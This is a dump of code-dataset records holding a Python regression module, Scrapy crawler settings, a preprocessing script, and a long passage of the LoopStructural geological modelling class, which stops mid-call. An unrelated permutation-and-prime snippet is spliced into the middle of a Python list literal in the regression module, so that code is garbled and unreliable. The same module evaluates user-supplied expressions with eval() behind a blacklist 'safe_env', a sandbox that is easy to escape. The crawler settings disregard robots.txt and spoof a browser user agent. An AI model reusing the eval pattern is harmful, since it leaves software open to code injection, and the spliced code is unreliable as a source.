Item.objects\r\n if filter_dict:\r\n qs = qs.filter(**filter_dict)\r\n if exclude_dict:\r\n qs = qs.exclude(**exclude_dict)\r\n qs = qs.all()\r\n\r\n # predictor variable values, one row for each variable, a column for each record in the queryset (value of the predictor)\r\n X = []\r\n\r\n import math\r\n\r\n math_env = dict([(name, getattr(math, name, lambda x: x)) for name in math.__dict__ if not name.startswith('__')])\r\n blacklist = ['credits', 'del', 
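# How the underscore-filling in smallest_good_prime() works, in isolation:
# permutations() of the unused digits are spliced into the '_' slots in order,
# and the first candidate passing the primality/distinct-digit test wins.
from itertools import permutations

def fill(pattern, digits):
    it = iter(digits)
    return int(''.join(next(it) if ch == '_' else ch for ch in pattern))

candidates = [fill('1_7', p) for p in permutations('2345689', 1)]
print(candidates)   # [127, 137, 147, 157, 167, 187, 197]; 127 is the good prime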
'delattr', 'dir', 'dreload', 'file', 'frozenset', 'get_ipython', 'make_option', 'os', 'sys', 'eval', 'globals', 'locals', 'open', 'exec', 'execfile']\r\n whitelist = ['sum', 'pow', 'float', 'int', 'floor', 'len', 'list', 'max', 'min', 'oct', 'ord', 'tuple', 'dict', 'str', 'unicode', 'type', 'isinstance', 'hex', 'ord', 'hash']\r\n global_env = dict([(name, __builtins__.get(name, lambda x: x)) for name in __builtins__ if name in whitelist and name not in blacklist and not name.startswith('__')])\r\n\r\n safe_env = {\r\n \"locals\": None,\r\n \"globals\": None,\r\n \"__name__\": None,\r\n \"__file__\": None,\r\n \"__builtins__\": None,\r\n }\r\n\r\n safe_env.update(global_env)\r\n safe_env.update(math_env)\r\n\r\n N = min(max_num_records, qs.count(), MAX_NUM_RECORDS)\r\n y = []\r\n\r\n for record in qs[:N]:\r\n X += [[]]\r\n for name, expression in predictors.iteritems():\r\n safe_env['case'] = record\r\n X[-1] += [eval(expression, safe_env)]\r\n y += [eval(predicted, safe_env)]\r\n\r\n return X, y\r\n\r\n\r\ndef compute_fit(predictor_matrix, predicted_values):\r\n A = np.matrix(predictor_matrix)\r\n y = np.hstack(predicted_values)\r\n beta = np.linalg.lstsq(A, y)\r\n return beta\r\n\r\n\r\ndef demo():\r\n import nlp.plotter\r\n A, y = predictor_values()\r\n beta, residuals, rank, singular_values = compute_fit(A, y)\r\n nlp.plotter.regressionplot(A, y, (beta, residuals, rank, singular_values))\r\n","sub_path":"pug/nlp/mvlr.py","file_name":"mvlr.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"309836396","text":"\nimport redis\nBOT_NAME = 'xinlang_scrapy'\n\nSPIDER_MODULES = ['xinlang_scrapy.spiders']\nNEWSPIDER_MODULE = 'xinlang_scrapy.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36'\n\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False\n\n\nDOWNLOADER_MIDDLEWARES = {\n 'xinlang_scrapy.middlewares.UserAgentMiddleware': 543,\n}\nITEM_PIPELINES = {\n 'xinlang_scrapy.pipelines.XinlangScrapyPipeline': 300,\n}\npool = redis.ConnectionPool(host='localhost', port=6379, decode_responses=True)\nr = redis.Redis(connection_pool=pool,decode_responses=True)\n\nDAY = 7\n","sub_path":"2.爬虫/新浪搜索/xinlang_scrapy/xinlang_scrapy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"206816075","text":"# author : koristo1@fit.cvut.cz\nimport argparse\n\nfrom src.preprocessor import preprocess_collection\n\nparser = argparse.ArgumentParser(description=\"Collection preprocessing\")\nparser.add_argument(\"-i\", \"--input\", type=str, help=\"Path to the input collection directory\")\nparser.add_argument(\"-o\", \"--output\", type=str, help=\"Path to the output database file\")\nparser.add_argument(\"-f\", \"--frequency\", type=str, help=\"Path to the output frequency file\")\nargs = parser.parse_args()\npreprocess_collection(args.input, args.frequency, args.output)\n","sub_path":"preprocessing/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"363261925","text":"import logging\n\nimport numpy as np\nimport pandas as pd\n\nfrom LoopStructural.datasets import normal_vector_headers\nfrom 
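# What compute_fit() above hands back, shown on synthetic data: np.linalg.lstsq
# solves min ||A @ beta - y||^2 and returns (beta, residuals, rank, singular
# values). The coefficients are invented for the demo; rcond=None just silences
# the FutureWarning in newer NumPy.
import numpy as np

rng = np.random.default_rng(0)
A = np.column_stack([np.ones(50), rng.normal(size=50)])   # intercept + 1 predictor
y = A @ np.array([2.0, -3.0]) + 0.01 * rng.normal(size=50)
beta, residuals, rank, sv = np.linalg.lstsq(A, y, rcond=None)
print(np.round(beta, 2))                                  # ~ [ 2. -3.]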
LoopStructural.interpolators.discrete_fold_interpolator import \\\n    DiscreteFoldInterpolator as DFI\nfrom LoopStructural.interpolators.finite_difference_interpolator import \\\n    FiniteDifferenceInterpolator as FDI\nfrom LoopStructural.interpolators.piecewiselinear_interpolator import \\\n    PiecewiseLinearInterpolator as PLI\n\ntry:\n    from LoopStructural.interpolators.surfe_wrapper import \\\n        SurfeRBFInterpolator as Surfe\n\n    surfe = True\n\nexcept ImportError:\n    surfe = False\n\nfrom LoopStructural.utils.helper import all_heading, gradient_vec_names, \\\n    strike_dip_vector\nfrom LoopStructural.modelling.fault.fault_segment import FaultSegment\nfrom LoopStructural.modelling.features import \\\n    GeologicalFeatureInterpolator\nfrom LoopStructural.modelling.features import RegionFeature\nfrom LoopStructural.modelling.features import \\\n    StructuralFrameBuilder\nfrom LoopStructural.modelling.features import UnconformityFeature\nfrom LoopStructural.modelling.fold.fold import FoldEvent\nfrom LoopStructural.modelling.fold import FoldRotationAngle\nfrom LoopStructural.modelling.fold.foldframe import FoldFrame\nfrom LoopStructural.interpolators.structured_grid import StructuredGrid\nfrom LoopStructural.interpolators.structured_tetra import TetMesh\nfrom LoopStructural.utils.exceptions import LoopBaseException\n\nlogger = logging.getLogger(__name__)\nif not surfe:\n    logger.warning(\"Cannot import Surfe\")\n\n\ndef _calculate_average_intersection(series_builder, fold_frame, fold,\n                                    **kwargs):\n    \"\"\"Set the fold axis to the mean intersection lineation.\n\n    Parameters\n    ----------\n    series_builder\n    fold_frame\n    fold\n\n    Returns\n    -------\n\n    \"\"\"\n    l2 = fold_frame.calculate_intersection_lineation(\n        series_builder)\n    fold.fold_axis = np.mean(l2, axis=0)\n\n\nclass GeologicalModel:\n    \"\"\"\n    A geological model is the recipe for building a 3D model, including\n    the rescaling of the model coordinates to between 0 and 1.\n    \"\"\"\n    def __init__(self, origin, maximum, rescale=True, nsteps=(40, 40, 40),\n                 reuse_supports=False):\n        \"\"\"\n        Parameters\n        ----------\n        origin : numpy array\n            specifying the origin of the model\n        maximum : numpy array\n            specifying the maximum extent of the model\n        rescale : bool\n            whether to rescale the model coordinates to between 0 and 1\n\n        \"\"\"\n        self.features = []\n        self.feature_name_index = {}\n        self.data = None\n        self.nsteps = nsteps\n\n        # we want to rescale the model area so that the maximum length is 1\n        self.origin = np.array(origin).astype(float)\n\n        self.maximum = np.array(maximum).astype(float)\n        lengths = self.maximum - self.origin\n        self.scale_factor = 1.\n        self.bounding_box = np.zeros((2, 3))\n        self.bounding_box[1, :] = self.maximum - self.origin\n        if rescale:\n            self.scale_factor = np.max(lengths)\n\n        self.bounding_box /= self.scale_factor\n        self.support = {}\n        self.reuse_supports = reuse_supports\n        self.stratigraphic_column = None\n        self.parameters = {'features': [], 'model': {'bounding_box': self.origin.tolist() + self.maximum.tolist(),\n                                                     'rescale': rescale,\n                                                     'nsteps': nsteps,\n                                                     'reuse_supports': reuse_supports}}\n\n    @classmethod\n    def from_map2loop_directory(cls, m2l_directory, **kwargs):\n        \"\"\"Alternate constructor for a geological model using m2l output\n\n        Uses the information saved in the map2loop files to build a geological model.\n        You can specify kwargs for building foliation using foliation_params and for\n        faults using fault_params. 
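# The rescaling done in __init__ and set_model_data, reduced to its core: shift
# by the origin and divide by the longest box edge so coordinates live in
# [0, 1], then invert on the way out. Box numbers are illustrative.
import numpy as np

origin = np.array([1000., 2000., -500.])
maximum = np.array([3000., 6000., 500.])
scale_factor = np.max(maximum - origin)           # 4000, the longest edge

def to_model(xyz):
    return (xyz - origin) / scale_factor

def to_world(xyz):
    return xyz * scale_factor + origin

pt = np.array([2000., 4000., 0.])
assert np.allclose(to_world(to_model(pt)), pt)    # the round trip is lossless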
skip_faults is a flag that allows for the faults to be skipped.\n\n Parameters\n ----------\n m2l_directory : string\n path to map2loop directory\n\n Returns\n -------\n (GeologicalModel, dict)\n the created geological model and a dictionary of the map2loop data\n \"\"\"\n from LoopStructural.utils import process_map2loop, build_model\n m2l_data = process_map2loop(m2l_directory)\n return build_model(m2l_data,**kwargs), m2l_data\n\n def _add_feature(self, feature):\n \"\"\"\n Add a feature to the model stack\n\n Parameters\n ----------\n feature : GeologicalFeature\n the geological feature to add\n\n \"\"\"\n\n if feature.name in self.feature_name_index:\n logger.info(\"Feature %s already exists at %i, overwriting\" %\n (feature.name, self.feature_name_index[feature.name]))\n self.features[self.feature_name_index[feature.name]] = feature\n else:\n self.features.append(feature)\n self.feature_name_index[feature.name] = len(self.features) - 1\n logger.info(\"Adding %s to model at location %i\" % (\n feature.name, len(self.features)))\n self._add_domain_fault_above(feature)\n self._add_unconformity_above(feature)\n feature.set_model(self)\n\n def set_model_data(self, data):\n \"\"\"\n Set the data array for the model\n\n Parameters\n ----------\n data : pandas data frame\n with column headers corresponding to the\n type, X, Y, Z, nx, ny, nz, val, strike, dip, dip_dir, plunge,\n plunge_dir, azimuth\n\n Returns\n -------\n Note\n ----\n Type can be any unique identifier for the feature the data point\n 'eg' 'S0', 'S2', 'F1_axis'\n it is then used by the create functions to get the correct data\n \"\"\"\n if type(data) != pd.DataFrame:\n logger.warning(\n \"Data is not a pandas data frame, trying to read data frame \"\n \"from csv\")\n try:\n data = pd.read_csv(data)\n except:\n logger.error(\"Could not load pandas data frame from data\")\n\n self.data = data.copy()\n self.data['X'] -= self.origin[0]\n self.data['Y'] -= self.origin[1]\n self.data['Z'] -= self.origin[2]\n self.data['X'] /= self.scale_factor\n self.data['Y'] /= self.scale_factor\n self.data['Z'] /= self.scale_factor\n if 'type' in self.data:\n logger.warning(\"'type' is being replaced with 'feature_name' \\n\")\n self.data.rename(columns={'type':'feature_name'},inplace=True)\n for h in all_heading():\n if h not in self.data:\n self.data[h] = np.nan\n if h == 'w':\n self.data[h] = 1.\n if h == 'coord':\n self.data[h] = 0\n \n if 'strike' in self.data and 'dip' in self.data:\n mask = np.all(~np.isnan(self.data.loc[:, ['strike', 'dip']]),\n axis=1)\n self.data.loc[mask, gradient_vec_names()] = strike_dip_vector(\n self.data.loc[mask, 'strike'], self.data.loc[mask, 'dip'])\n self.data.drop(['strike', 'dip'], axis=1, inplace=True)\n # self.data.loc\n\n def extend_model_data(self, newdata):\n \"\"\"\n Extends the data frame\n\n Parameters\n ----------\n newdata : pandas data frame\n data to add to the existing dataframe\n Returns\n -------\n \"\"\"\n logger.warning(\"Extend data is untested and may have unexpected consequences\")\n data_temp = newdata.copy()\n data_temp['X'] -= self.origin[0]\n data_temp['Y'] -= self.origin[1]\n data_temp['Z'] -= self.origin[2]\n data_temp['X'] /= self.scale_factor\n data_temp['Y'] /= self.scale_factor\n data_temp['Z'] /= self.scale_factor\n self.data.concat([self.data, data_temp], sort=True)\n\n def set_stratigraphic_column(self, stratigraphic_column):\n \"\"\"\n Adds a stratigraphic column to the model\n\n Parameters\n ----------\n stratigraphic_column : dictionary\n\n Returns\n -------\n\n Notes\n 
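# set_model_data() above converts strike/dip pairs to gradient vectors through
# the imported strike_dip_vector helper. A common right-hand-rule version of
# that conversion is sketched below (x east, y north, z up); whether the sign
# convention matches LoopStructural's helper exactly is an assumption.
import numpy as np

def strike_dip_to_normal(strike_deg, dip_deg):
    s, d = np.radians(strike_deg), np.radians(dip_deg)
    return np.array([np.sin(d) * np.cos(s),     # east component
                     -np.sin(d) * np.sin(s),    # north component
                     np.cos(d)])                # up component

print(strike_dip_to_normal(0., 0.))    # flat-lying plane   -> ~[0, 0, 1]
print(strike_dip_to_normal(90., 90.))  # vertical E-W plane -> ~[0, -1, 0]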
-----\n stratigraphic_column is a nested dictionary with the format\n {'group':\n {'series1':\n {'min':0., 'max':10.,'id':0}\n }\n }\n\n \"\"\"\n self.stratigraphic_column = stratigraphic_column\n\n def create_from_feature_list(self, features):\n for f in features:\n featuretype = f.pop('featuretype', None)\n if featuretype is None:\n raise LoopBaseException\n if featuretype == 'strati':\n self.create_and_add_foliation(f)\n # if featuretype == 'fault':\n # self.create_and_add_fault(f)\n if featuretype == 'folded_strati':\n self.create_and_add_folded_foliation(f)\n\n def get_interpolator(self, interpolatortype='PLI', nelements=5e5,\n buffer=0.2, **kwargs):\n \"\"\"\n Returns an interpolator given the arguments, also constructs a\n support for a discrete interpolator\n\n Parameters\n ----------\n interpolatortype : string\n define the interpolator type\n nelements : int\n number of elements in the interpolator\n buffer : double or numpy array 3x1\n value(s) between 0,1 specifying the buffer around the bounding box\n data_bb : bool\n whether to use the model boundary or the boundary around\n kwargs : no kwargs used, this just catches any additional arguments\n\n Returns\n -------\n \"\"\"\n # get an interpolator for\n interpolator = None\n bb = np.copy(self.bounding_box)\n # add a buffer to the interpolation domain, this is necessary for\n # faults but also generally a good\n # idea to avoid boundary problems\n bb[0, :] -= buffer # *(bb[1,:]-bb[0,:])\n bb[1, :] += buffer # *(bb[1,:]-bb[0,:])\n if interpolatortype == \"PLI\":\n nelements /= 5\n ele_vol = bb[1, 0] * bb[1, 1] * bb[1, 2] / nelements\n # calculate the step vector of a regular cube\n step_vector = np.zeros(3)\n step_vector[:] = ele_vol ** (1. / 3.)\n # number of steps is the length of the box / step vector\n nsteps = ((bb[1, :] - bb[0, :]) / step_vector).astype(int)\n # create a structured grid using the origin and number of steps\n mesh_id = 'mesh_{}'.format(nelements)\n mesh = self.support.get(mesh_id,\n TetMesh(origin=bb[0, :], nsteps=nsteps,\n step_vector=step_vector))\n if mesh_id not in self.support:\n self.support[mesh_id] = mesh\n logger.info(\"Creating regular tetrahedron mesh with %i elements \\n\"\n \"for modelling using PLI\" % (mesh.ntetra))\n\n return PLI(mesh)\n\n if interpolatortype == 'FDI':\n # find the volume of one element\n ele_vol = bb[1, 0] * bb[1, 1] * bb[1, 2] / nelements\n # calculate the step vector of a regular cube\n step_vector = np.zeros(3)\n step_vector[:] = ele_vol ** (1. / 3.)\n # number of steps is the length of the box / step vector\n nsteps = ((bb[1, :] - bb[0, :]) / step_vector).astype(int)\n # create a structured grid using the origin and number of steps\n grid_id = 'grid_{}'.format(nelements)\n grid = self.support.get(grid_id, StructuredGrid(origin=bb[0, :],\n nsteps=nsteps,\n step_vector=step_vector))\n if grid_id not in self.support:\n self.support[grid_id] = grid\n logger.info(\"Creating regular grid with %i elements \\n\"\n \"for modelling using FDI\" % grid.n_elements)\n return FDI(grid)\n\n if interpolatortype == \"DFI\": # \"fold\" in kwargs:\n nelements /= 5\n ele_vol = bb[1, 0] * bb[1, 1] * bb[1, 2] / nelements\n # calculate the step vector of a regular cube\n step_vector = np.zeros(3)\n step_vector[:] = ele_vol ** (1. 
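# The grid sizing inside get_interpolator(), in isolation: aim for a target
# element count, give every element the volume of a cube, and derive the step
# size and steps per axis from the bounding box. Numbers are illustrative; the
# product of nsteps comes out close to (not exactly) nelements.
import numpy as np

bb = np.array([[0., 0., 0.], [1., 0.5, 0.25]])    # [origin; maximum]
nelements = 1e4
ele_vol = np.prod(bb[1] - bb[0]) / nelements      # volume of one element
step_vector = ele_vol ** (1. / 3.)                # edge of the equivalent cube
nsteps = ((bb[1] - bb[0]) / step_vector).astype(int)
print(step_vector, nsteps, nsteps.prod())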
/ 3.)\n # number of steps is the length of the box / step vector\n nsteps = ((bb[1, :] - bb[0, :]) / step_vector).astype(int)\n # create a structured grid using the origin and number of steps\n mesh = kwargs.get('mesh', TetMesh(origin=bb[0, :], nsteps=nsteps,\n step_vector=step_vector))\n logger.info(\"Creating regular tetrahedron mesh with %i elements \\n\"\n \"for modelling using DFI\" % mesh.ntetra)\n return DFI(mesh, kwargs['fold'])\n if interpolatortype == 'Surfe' or interpolatortype == 'surfe' and \\\n surfe:\n method = kwargs.get('method', 'single_surface')\n logger.info(\"Using surfe interpolator\")\n return Surfe(method)\n logger.warning(\"No interpolator\")\n return interpolator\n\n def create_and_add_foliation(self, series_surface_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n series_surface_data : string\n corresponding to the feature_name in the data\n kwargs\n\n Returns\n -------\n feature : GeologicalFeature\n the created geological feature\n \"\"\"\n self.parameters['features'].append({'feature_type': 'foliation', 'feature_name': series_surface_data, **kwargs})\n interpolator = self.get_interpolator(**kwargs)\n series_builder = GeologicalFeatureInterpolator(interpolator,\n name=series_surface_data,\n **kwargs)\n # add data\n series_data = self.data[self.data['feature_name'] == series_surface_data]\n if series_data.shape[0] == 0:\n logger.warning(\"No data for %s, skipping\" % series_surface_data)\n return\n series_builder.add_data_from_data_frame(series_data)\n self._add_faults(series_builder)\n\n # build feature\n series_feature = series_builder.build(**kwargs)\n series_feature.type = 'series'\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(series_feature)self._add_feature(series_feature)\n self._add_feature(series_feature)\n return series_feature\n\n def create_and_add_fold_frame(self, foldframe_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n foldframe_data : string\n unique string in feature_name column\n\n kwargs\n\n Returns\n -------\n fold_frame : FoldFrame\n the created fold frame\n \"\"\"\n self.parameters['features'].append({'feature_type': 'fold_frame', 'feature_name': foldframe_data, **kwargs})\n result = {}\n # create fault frame\n interpolator = self.get_interpolator(**kwargs)\n #\n fold_frame_builder = StructuralFrameBuilder(interpolator,\n name=foldframe_data,\n **kwargs)\n # add data\n fold_frame_data = self.data[self.data['feature_name'] == foldframe_data]\n fold_frame_builder.add_data_from_data_frame(fold_frame_data)\n self._add_faults(fold_frame_builder[0])\n self._add_faults(fold_frame_builder[1])\n self._add_faults(fold_frame_builder[2])\n\n fold_frame = fold_frame_builder.build(frame=FoldFrame, **kwargs)\n # for i in range(3):\n # self._add_unconformity_above(fold_frame[i])\n fold_frame.type = 'structuralframe'\n self._add_feature(fold_frame)\n \n return fold_frame\n\n def create_and_add_folded_foliation(self, foliation_data, fold_frame=None,\n **kwargs):\n \"\"\"\n Create a folded foliation field from data and a fold frame\n\n Parameters\n ----------\n foliation_data : string\n unique string in type column of data frame\n fold_frame : FoldFrame\n kwargs\n additional kwargs to be passed through to other functions\n\n Returns\n -------\n feature : GeologicalFeature\n created geological feature\n \"\"\"\n self.parameters['features'].append(\n {'feature_type': 'fold_foliation', 'feature_name': foliation_data, 'fold_frame': fold_frame, **kwargs})\n if fold_frame is None:\n 
logger.info(\"Using last feature as fold frame\")\n fold_frame = self.features[-1]\n assert type(fold_frame) == FoldFrame, \"Please specify a FoldFrame\"\n fold = FoldEvent(fold_frame)\n fold_interpolator = self.get_interpolator(\"DFI\", fold=fold, **kwargs)\n series_builder = GeologicalFeatureInterpolator(\n interpolator=fold_interpolator,\n name=foliation_data)\n\n series_builder.add_data_from_data_frame(\n self.data[self.data['feature_name'] == foliation_data])\n self._add_faults(series_builder)\n\n series_builder.add_data_to_interpolator(True)\n if \"fold_axis\" in kwargs:\n fold.fold_axis = kwargs['fold_axis']\n if \"av_fold_axis\" in kwargs:\n _calculate_average_intersection(series_builder, fold_frame, fold)\n if fold.fold_axis is None:\n far, fad = fold_frame.calculate_fold_axis_rotation(\n series_builder)\n fold_axis_rotation = FoldRotationAngle(far, fad)\n a_wl = kwargs.get(\"axis_wl\", None)\n if 'axis_function' in kwargs:\n # allow predefined function to be used\n fold_axis_rotation.set_function(kwargs['axis_function'])\n else:\n fold_axis_rotation.fit_fourier_series(wl=a_wl)\n fold.fold_axis_rotation = fold_axis_rotation\n # give option of passing own fold limb rotation function\n flr, fld = fold_frame.calculate_fold_limb_rotation(\n series_builder)\n fold_limb_rotation = FoldRotationAngle(flr, fld)\n l_wl = kwargs.get(\"limb_wl\", None)\n if 'limb_function' in kwargs:\n # allow for predefined functions to be used\n fold_limb_rotation.set_function(kwargs['limb_function'])\n else:\n fold_limb_rotation.fit_fourier_series(wl=l_wl)\n fold.fold_limb_rotation = fold_limb_rotation\n # fold_limb_fitter = kwargs.get(\"fold_limb_function\",\n # _interpolate_fold_limb_rotation_angle)\n # fold_limb_fitter(series_builder, fold_frame, fold, result, **kwargs)\n kwargs['fold_weights'] = kwargs.get('fold_weights', None)\n\n self._add_faults(series_builder)\n # build feature\n kwargs['cgw'] = 0.\n kwargs['fold'] = fold\n series_feature = series_builder.build(**kwargs)\n series_feature.type = 'series'\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(series_feature)self._add_feature(series_feature)\n # result['support'] = series_feature.get_interpolator().support\n self._add_feature(series_feature)\n return series_feature\n\n def create_and_add_folded_fold_frame(self, fold_frame_data,\n fold_frame=None,\n **kwargs):\n \"\"\"\n\n Parameters\n ----------\n fold_frame_data : string\n\n fold_frame : StructuralFrame\n\n kwargs\n\n Returns\n -------\n fold_frame : FoldFrame\n created fold frame\n \"\"\"\n self.parameters['features'].append(\n {'feature_type': 'folded_fold_frame', 'feature_name': fold_frame_data, 'fold_frame': fold_frame, **kwargs})\n if fold_frame is None:\n logger.info(\"Using last feature as fold frame\")\n fold_frame = self.features[-1]\n assert type(fold_frame) == FoldFrame, \"Please specify a FoldFrame\"\n fold = FoldEvent(fold_frame)\n fold_interpolator = self.get_interpolator(\"DFI\", fold=fold, **kwargs)\n frame_interpolator = self.get_interpolator(**kwargs)\n interpolators = [fold_interpolator, frame_interpolator,\n frame_interpolator.copy()]\n fold_frame_builder = StructuralFrameBuilder(\n interpolators=interpolators, name=fold_frame_data, **kwargs)\n fold_frame_builder.add_data_from_data_frame(\n self.data[self.data['feature_name'] == fold_frame_data])\n\n ## add the data to the interpolator for the main foliation\n fold_frame_builder[0].add_data_to_interpolator(True)\n if \"fold_axis\" in kwargs:\n fold.fold_axis = 
kwargs['fold_axis']\n if \"av_fold_axis\" in kwargs:\n _calculate_average_intersection(fold_frame_builder[0], fold_frame,\n fold)\n\n if fold.fold_axis is None:\n far, fad = fold_frame.calculate_fold_axis_rotation(\n fold_frame_builder[0])\n fold_axis_rotation = FoldRotationAngle(far, fad)\n a_wl = kwargs.get(\"axis_wl\", None)\n if 'axis_function' in kwargs:\n # allow predefined function to be used\n fold_axis_rotation.set_function(kwargs['axis_function'])\n else:\n fold_axis_rotation.fit_fourier_series(wl=a_wl)\n fold.fold_axis_rotation = fold_axis_rotation\n # give option of passing own fold limb rotation function\n flr, fld = fold_frame.calculate_fold_limb_rotation(\n fold_frame_builder[0])\n fold_limb_rotation = FoldRotationAngle(flr, fld)\n l_wl = kwargs.get(\"limb_wl\", None)\n if 'limb_function' in kwargs:\n # allow for predefined functions to be used\n fold_limb_rotation.set_function(kwargs['limb_function'])\n else:\n fold_limb_rotation.fit_fourier_series(wl=l_wl)\n fold.fold_limb_rotation = fold_limb_rotation\n # fold_limb_fitter = kwargs.get(\"fold_limb_function\",\n # _interpolate_fold_limb_rotation_angle)\n # fold_limb_fitter(series_builder, fold_frame, fold, result, **kwargs)\n kwargs['fold_weights'] = kwargs.get('fold_weights', None)\n\n for i in range(3):\n self._add_faults(fold_frame_builder[i])\n # build feature\n kwargs['cgw'] = 0.\n kwargs['fold'] = fold\n self._add_faults(fold_frame_builder[0])\n self._add_faults(fold_frame_builder[1])\n self._add_faults(fold_frame_builder[2])\n fold_frame = fold_frame_builder.build(**kwargs, frame=FoldFrame)\n fold_frame.type = 'structuralframe'\n # see if any unconformities are above this feature if so add region\n # for i in range(3):\n # self._add_unconformity_above(fold_frame[i])\n\n self._add_feature(fold_frame)\n \n\n return fold_frame\n\n def _add_faults(self, feature_builder, features=None):\n \"\"\"\n\n Parameters\n ----------\n feature_builder\n\n Returns\n -------\n\n \"\"\"\n if features is None:\n features = self.features\n for f in reversed(features):\n if f.type == 'fault':\n feature_builder.add_fault(f)\n # if f.type == 'unconformity':\n # break\n def _add_domain_fault_above(self, feature):\n \"\"\"\n Looks through the feature list and adds any domain faults to the feature. The domain fault masks everything\n where the fault scalar field is < 0 as being active when added to feature.\n\n Parameters\n ----------\n feature : GeologicalFeatureInterpolator\n the feature being added to the model where domain faults should be added\n\n Returns\n -------\n\n \"\"\"\n for f in reversed(self.features):\n if f.type == 'domain_fault':\n feature.add_region(lambda pos: f.evaluate_value(pos) < 0)\n break\n\n def _add_domain_fault_below(self, domain_fault):\n \"\"\"\n Looks through the feature list and adds any the domain_fault to the features that already exist in the stack\n until an unconformity is reached. domain faults to the feature. 
The domain fault masks everything\n where the fault scalar field is < 0 as being active when added to feature.\n\n Parameters\n ----------\n feature : GeologicalFeatureInterpolator\n the feature being added to the model where domain faults should be added\n\n Returns\n -------\n\n \"\"\"\n for f in reversed(self.features):\n f.add_region(lambda pos: domain_fault.evaluate_value(pos) > 0)\n if f.type == 'unconformity':\n break\n\n def _add_unconformity_above(self, feature):\n \"\"\"\n\n Adds a region to the feature to prevent the value from being\n interpolated where the unconformities exists above e.g.\n if there is another feature above and the unconformity is at 0\n then the features added below (after) will only be visible where the\n uncomformity is <0\n\n Parameters\n ----------\n feature - GeologicalFeature\n\n Returns\n -------\n\n \"\"\"\n for f in reversed(self.features):\n if f.type == 'unconformity':\n feature.add_region(lambda pos: f.evaluate(pos))\n break\n\n def _add_unconformity_below(self, feature):\n \"\"\"\n Adds a region to the features that represents the\n unconformity so it is not evaluated below the unconformity\n\n Parameters\n ----------\n feature\n\n Returns\n -------\n\n \"\"\"\n for f in self.features:\n if f.type == 'series' and feature.feature.name != f.name:\n f.add_region(lambda pos: ~feature.evaluate(pos))\n # for f in reversed(self.features):\n # if f.type == 'unconformity':\n # feature.add_region(lambda pos: f.evaluate(pos))\n # break\n # feature.add_region(lambda pos: ~uc.evaluate(pos))\n\n def create_and_add_unconformity(self, unconformity_surface_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n unconformity_surface_data : string\n name of the unconformity data in the data frame\n\n Returns\n -------\n \"\"\"\n # self.parameters['features'].append({'feature_type':'unconformity','feature_name':unconformity_surface_data,**kwargs})\n interpolator = self.get_interpolator(**kwargs)\n unconformity_feature_builder = GeologicalFeatureInterpolator(\n interpolator, name=unconformity_surface_data)\n # add data\n unconformity_data = self.data[\n self.data['feature_name'] == unconformity_surface_data]\n\n unconformity_feature_builder.add_data_from_data_frame(\n unconformity_data)\n # look through existing features if there is a fault before an\n # unconformity\n # then add to the feature, once we get to an unconformity stop\n self._add_faults(unconformity_feature_builder)\n\n # build feature\n uc_feature_base = unconformity_feature_builder.build(**kwargs)\n uc_feature_base.type = 'unconformity_base'\n # uc_feature = UnconformityFeature(uc_feature_base,0)\n # iterate over existing features and add the unconformity as a\n # region so the feature is only\n # evaluated where the unconformity is positive\n return self.add_unconformity(uc_feature_base, 0)\n\n def add_unconformity(self, feature, value):\n \"\"\"\n Use an existing feature to add an unconformity to the model.\n\n Parameters\n ----------\n feature : GeologicalFeature\n existing geological feature\n value : float\n scalar value of isosurface that represents\n\n Returns\n -------\n unconformity : GeologicalFeature\n unconformity feature \n\n \"\"\"\n self.parameters['features'].append({'feature_type': 'unconformity', 'feature': feature, 'value': value})\n uc_feature = UnconformityFeature(feature, value)\n\n # for f in self.features:\n # f.add_region(lambda pos: uc_feature.evaluate(pos))\n\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(uc_feature)\n # 
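# The region predicates above are lambdas closing over feature objects; the
# loops here stay safe because they bind a parameter or break after one match.
# When several closures are created in one loop, remember Python's late
# binding: capture the loop variable as a default argument or every closure
# will see its final value. A toy demonstration:
preds = [lambda x: x > cutoff for cutoff in (1, 2, 3)]
print([p(2.5) for p in preds])                 # [False, False, False] -- all see 3
preds = [lambda x, c=cutoff: x > c for cutoff in (1, 2, 3)]
print([p(2.5) for p in preds])                 # [True, True, False] -- as intended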
self._add_unconformity_below(feature)#, uc_feature)\n self._add_feature(uc_feature)\n\n \n return uc_feature\n\n def add_onlap_unconformity(self, feature, value):\n \"\"\"\n Use an existing feature to add an unconformity to the model.\n\n Parameters\n ----------\n feature : GeologicalFeature\n existing geological feature\n value : float\n scalar value of isosurface that represents\n\n Returns\n -------\n unconformity_feature : GeologicalFeature\n the created unconformity\n\n \"\"\"\n self.parameters['features'].append({'feature_type': 'onlap', 'feature': feature, 'value': value})\n\n uc_feature = UnconformityFeature(feature, value)\n\n # for f in self.features:\n # f.add_region(lambda pos: uc_feature.evaluate(pos))\n\n # see if any unconformities are above this feature if so add region\n # self._add_unconformity_above(uc_feature)\n self._add_unconformity_below(uc_feature) # , uc_feature)\n self._add_feature(uc_feature)\n\n\n return uc_feature\n\n def create_and_add_domain_fault(self, fault_surface_data, **kwargs):\n \"\"\"\n Parameters\n ----------\n fault_surface_data : string\n name of the domain fault data in the data frame\n\n Returns\n -------\n domain_Fault : GeologicalFeature\n the created domain fault\n\n \"\"\"\n # self.parameters['features'].append({'feature_type':'unconformity','feature_name':unconformity_surface_data,**kwargs})\n interpolator = self.get_interpolator(**kwargs)\n domain_fault_feature_builder = GeologicalFeatureInterpolator(\n interpolator, name=fault_surface_data)\n # add data\n unconformity_data = self.data[\n self.data['feature_name'] == fault_surface_data]\n\n domain_fault_feature_builder.add_data_from_data_frame(\n 